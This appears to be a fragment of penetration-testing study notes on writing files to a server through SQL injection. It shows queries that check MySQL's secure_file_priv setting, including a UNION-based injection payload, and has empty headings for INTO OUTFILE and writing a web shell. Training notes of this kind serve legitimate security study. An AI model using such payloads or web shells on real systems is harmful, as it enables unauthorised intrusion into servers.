Writing Files
Secure_file_priv
SHOW VARIABLES LIKE 'secure_file_priv';SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -
SELECT INTO OUTFILE
Writing Files through SQL Injection


Writing a Web Shell


WriteUp



Last updated